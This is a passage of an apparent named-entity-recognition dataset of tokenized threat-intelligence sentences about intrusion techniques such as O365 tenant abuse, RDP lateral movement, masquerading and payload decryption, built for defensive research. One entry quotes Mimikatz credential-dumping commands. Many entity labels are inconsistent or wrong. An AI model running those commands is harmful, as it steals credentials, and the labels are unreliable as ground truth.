"WMI", - "“under", - "the", - "hood," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malicious", - "authentications", - "into", - "victim", - "O365", - "tenants", - "had", - "originated", - "from", - "within", - "the", - "victim’s", - "own", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "was", - "making", - "authentications", - "to", - "O365" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Log", - "in", - "to", - "O365", - "as", - "a", - "user", - "with", - "privileged", - "access", - "to", - "cloud", - "resources." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "succeeded", - "in", - "authenticating", - "into", - "victim", - "O365", - "tenants" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "This", - "threat", - "actor", - "abused", - "access", - "to", - "accounts", - "in", - "the", - "Cloud", - "Solution", - "Partner’s", - "environment", - "with", - "legitimate", - "delegated", - "administrative", - "privileges", - "to", - "then", - "gain", - "access", - "to", - "several", - "customers’", - "O365", - "environments" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "connected", - "to", - "the", - "victim’s", - "O365", - "tenant" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "user", - "account", - "used", - "to", - "connect", - "to", - "the", - "victim’s", - "O365", - "tenant" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "managed", - "to", - "continue", - "to", - "access", - "the", - "victim’s", - "cloud", - "environment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "accounts", - "that", - "were", - "used", - "to", - "authenticate", - "to", - "the", - "cloud." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "used", - "a", - "compromised", - "O365", - "administrator", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "created", - "new", - "O365", - "Service", - "Principals", - "to", - "maintain", - "access", - "to", - "victim’s", - "environments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "used", - "accounts", - "with", - "Delegated", - "Administrator", - "rights", - "to", - "access", - "other", - "O365", - "tenants" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "leveraged", - "different", - "credentials", - "for", - "each", - "step", - "while", - "moving", - "laterally", - "through", - "the", - "victim’s", - "network" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "privileged", - "accounts", - "and", - "then", - "accessed", - "the", - "wiki", - "using", - "a", - "different", - "set", - "of", - "credentials." - ], - "ner_tags": [ - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "began", - "attempting", - "to", - "connect", - "into", - "the", - "environment", - "via", - "VPN" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "attempted", - "to", - "log", - "in", - "to", - "the", - "VPN", - "using", - "several", - "user", - "accounts" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actor", - "had", - "knowledge", - "of", - "these", - "accounts", - "and", - "used", - "them", - "on", - "the", - "correct", - "systems" - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "connected", - "into", - "the", - "victim’s", - "environment", - "via", - "a", - "VPN" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "Threat", - "actor", - "also", - "used", - "valid", - "accounts", - "to", - "create", - "persistence", - "within", - "the", - "environment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "establish", - "a", - "Remote", - "Desktop", - "Protocol", - "(RDP)", - "session", - "to", - "an", - "internal", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establish", - "another", - "RDP", - "session", - "to", - "a", - "different", - "internal", - "server" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "connected", - "via", - "RDP", - "to", - "a", - "user’s", - "workstation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor’s", - "RDP", - "session." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "established", - "RDP", - "sessions", - "to", - "internal", - "servers" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "connected", - "via", - "Remote", - "Desktop" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "user", - "the", - "threat", - "actor", - "used", - "to", - "RDP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "connected", - "via", - "Remote", - "Desktop", - "to", - "a", - "Domain", - "Controller" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "used", - "both", - "privileged", - "and", - "non-privileged", - "accounts", - "for", - "RDP", - "throughout", - "the", - "environment,", - "depending", - "on", - "the", - "target", - "system" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "domain", - "service", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "domain", - "administrator’s", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "could", - "have", - "easily", - "used", - "a", - "second", - "domain", - "administrator", - "account" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "accomplished", - "this", - "by", - "using", - "administrative", - "accounts" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "given", - "user", - "account", - "was", - "also", - "authenticating", - "to", - "Active", - "Directory", - "from", - "a", - "given", - "source", - "IP", - "address", - "two", - "years", - "prior" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "user", - "account", - "was", - "known", - "to", - "have", - "recently", - "been", - "abused", - "by", - "the", - "threat", - "actor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "accessing", - "the", - "wiki", - "as", - "users", - "who", - "would", - "be", - "considered", - "“non-privileged”" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "local", - "account", - "was", - "used", - "by", - "the", - "Threat", - "Actor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "connect", - "via", - "SMB", - "to", - "targeted", - "users,", - "and", - "then", - "copy", - "their", - "Chrome", - "profile", - "directories", - "as", - "well", - "as", - "data", - "protection", - "API", - "(DPAPI)", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "connected", - "via", - "Remote", - "Desktop", - "to", - "a", - "Domain", - "Controller", - "and", - "copied", - "the", - "DSInternals10", - "PowerShell", - "module", - "to", - "the", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "must", - "first", - "decrypt", - "them" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "decrypted", - "the", - "cookies", - "file", - "using", - "the", - "user’s", - "DPAPI", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "of", - "the", - "cookies" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deleted", - "the", - "specific", - "history", - "items", - "related", - "to", - "threat", - "actor", - "activity" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attempted", - "to", - "blend", - "in", - "with", - "a", - "file", - "name", - "that", - "matched", - "the", - "system", - "name", - "it", - "resided", - "on" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attempted", - "to", - "blend", - "in", - "with", - "a", - "file", - "name", - "that", - "matched", - "the", - "system", - "name", - "it", - "resided", - "on" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "the", - "binary", - "named", - "to", - "masquerade", - "as", - "a", - "legitimate", - "file", - "on", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AdFind", - "was", - "renamed", - "to", - "masquerade", - "as", - "a", - "legitimate", - "Windows", - "binary" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "renamed", - "their", - "utilities", - "to", - "masquerade", - "as", - "legitimate", - "system", - "binaries", - "(AdFind", - "as", - "svchost.exe),", - "match", - "the", - "system’s", - "role", - "(GoldMax),", - "or", - "appear", - "legitimate", - "(TrailBlazer", - "as", - "an", - "apparent", - "Adobe", - "utility)." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "renamed", - "their", - "systems", - "prior", - "to", - "connecting", - "to", - "victim’s", - "VPNs", - "to", - "match", - "the", - "victim’s", - "system", - "naming", - "convention" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Masquerades", - "its", - "command-and-control", - "(C2)", - "traffic", - "as", - "legitimate", - "Google", - "Notifications", - "HTTP", - "requests" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "placed", - "in", - "a", - "hidden", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "directories", - "with", - "random", - "names", - "of", - "a", - "consistent", - "length", - "were", - "navigated", - "to", - "by", - "the", - "same", - "user", - "that", - "ran", - "the", - "tool." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ListUsers" - ], - "ner_tags": [ - "B-Time" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "attempted", - "to", - "remotely", - "list", - "running", - "processes", - "on", - "systems", - "using", - "tasklist.exe" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "process", - "listing" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "remote", - "process", - "listing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "was", - "running", - "tasklist", - "remotely", - "on", - "these", - "systems", - "specifically", - "to", - "see", - "which", - "of", - "the", - "target", - "systems", - "was", - "running", - "Google", - "Chrome." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "regularly", - "interrogated", - "other", - "systems", - "using", - "tasklist.exe" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "use", - "of", - "a", - "PowerShell", - "script", - "to", - "execute", - "Mimikatz", - "in-memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "to", - "execute", - "the", - "Mimikatz", - "commands", - "‘privilege::debug", - "sekurlsa::logonpasswords", - "“lsadump::lsa", - "/patch”‘", - "in-memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "script", - "executed", - "by", - "the", - "threat", - "actor", - "was", - "heavily", - "obfuscated", - "and", - "encrypted", - "the", - "output", - "using", - "AES256." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "used", - "a", - "heavily", - "obfuscated", - "PowerShell", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Way" - ] - }, - { - "tokens": [ - "enumerating", - "current", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "tries", - "to", - "enumerate", - "the", - "current", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "crawl", - "the", - "filesystem" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "try", - "to", - "decrypt", - "it", - "using", - "the", - "RC4", - "encryption", - "scheme", - "with", - "the", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "decrypts", - "and", - "communicates", - "to" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "the", - "embedded", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contain", - "encrypted", - "C2", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Embedded", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "has", - "an", - "encrypted", - "payload", - "embedded", - "in", - "it." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "embedded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "side", - "loading", - "“ffmpeg.dll”." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "that", - "have", - "Base64", - "and", - "AES", - "encrypted", - "C2’s", - "appended", - "to", - "them" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "NetWkstaGetInfo()", - "API." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "name,", - "Hostname", - "and", - "OS", - "Version" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "info", - "stealer", - "also", - "collects", - "information", - "on", - "infected", - "hosts" - ], - "ner_tags": [ - "O", - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Manipulates", - "registry" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "and", - "executing", - "the", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "a", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "performed", - "through", - "the", - "CryptUnprotectData", - "API", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "shellcode", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Encrypts", - "a", - "provided", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLLs", - "with", - "the", - "names", - "ualapi.dll", - "and", - "ncobjapi.dll", - "being", - "sideloaded" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "system", - "information", - "and", - "browser", - "history,", - "then", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "an", - "infostealer", - "and", - "starts", - "it." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Performs", - "payload", - "injections", - "through", - "syscalls", - "via", - "mapping", - "a", - "shellcode", - "to", - "a", - "remote", - "process", - "and", - "creating", - "a", - "remote", - "thread." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "driver", - "collects", - "information", - "about", - "installed", - "AV", - "filters" - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Connects", - "to", - "a", - "given", - "host", - "via", - "a", - "socket", - "and", - "waits", - "for", - "the", - "server", - "to", - "send", - "data." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Manipulates", - "(creates,", - "lists,", - "starts,", - "stops", - "and", - "deletes)", - "services." - ], - "ner_tags": [ - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "attackers", - "placed" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "attackers", - "placed" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "administrator", - "credentials" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "compromised", - "administrative", - "[T1078.001]", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "user" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Access", - "to", - "valid" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "locate", - "high", - "value", - "assets", - "in", - "order", - "to", - "exfiltrate", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Spearphishing", - "emails", - "with", - "malicious", - "attachments" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attached", - "to", - "spearphishing", - "emails" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "exploitation", - "of", - "public-facing", - "applications" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "User", - "execution", - "[T1204]", - "of", - "malicious", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "steganography", - "[T1027.003]", - "to", - "hide", - "stolen", - "data", - "inside", - "other", - "files", - "stored", - "on", - "GitHub" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "multi-hop", - "proxies" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "stage", - "collected", - "data", - "locally" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exfiltration", - "over", - "C2", - "channel" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "24", - "different", - "IP", - "addresses", - "in", - "use" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compromised", - "devices", - "that", - "act", - "as", - "proxies", - "for", - "their", - "C&C", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "some", - "victims", - "as", - "proxies,", - "or", - "some", - "vulnerable", - "devices", - "to", - "forward", - "communication", - "to", - "their", - "real", - "C&C", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "phishing", - "emails", - "have", - "similar", - "topics", - "and", - "pretend", - "to", - "come", - "from", - "some", - "of", - "the", - "same", - "entities" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attachments", - "used", - "for", - "phishing", - "emails," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "emails", - "have", - "a", - "PDF", - "document", - "attached" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "PDF", - "file", - "attached" - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "used", - "emails", - "with", - "PDF", - "or", - "RTF", - "files", - "attached", - "that", - "contain", - "a", - "link", - "to", - "download", - "malware" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Tool", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "user", - "must", - "click", - "to", - "download", - "the", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "manually", - "extract", - "the", - "file", - "and", - "execute", - "it" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "attempted", - "to", - "get", - "users", - "to", - "execute", - "malicious", - "files", - "masquerading", - "as", - "documents" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "regular", - "RAR", - "archives", - "that", - "have", - "an", - "executable", - "file", - "inside." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "several", - "benign", - "files", - "that", - "are", - "written", - "to", - "disk", - "(they", - "are", - "not", - "part", - "of", - "NSIS", - "binaries", - "and", - "they", - "are", - "not", - "used", - "at", - "all", - "by", - "the", - "installer)", - "and", - "two", - "files", - "that", - "are", - "malicious" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reads", - "a", - "string", - "(or", - "binary", - "data)", - "from", - "its", - "resource", - "section" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reads", - "data", - "from", - "its", - "own", - "resource", - "section", - "and", - "decrypts", - "a", - "payload." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "read", - "from", - "an", - "encrypted", - "resource" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "two", - "shellcodes", - "contained", - "in", - "the", - "compiled", - "AutoIt", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Read", - "a", - "binary", - "from", - "its", - "resource", - "section,", - "write", - "it", - "to", - "disk", - "and", - "execute", - "it" - ], - "ner_tags": [ - "O", - 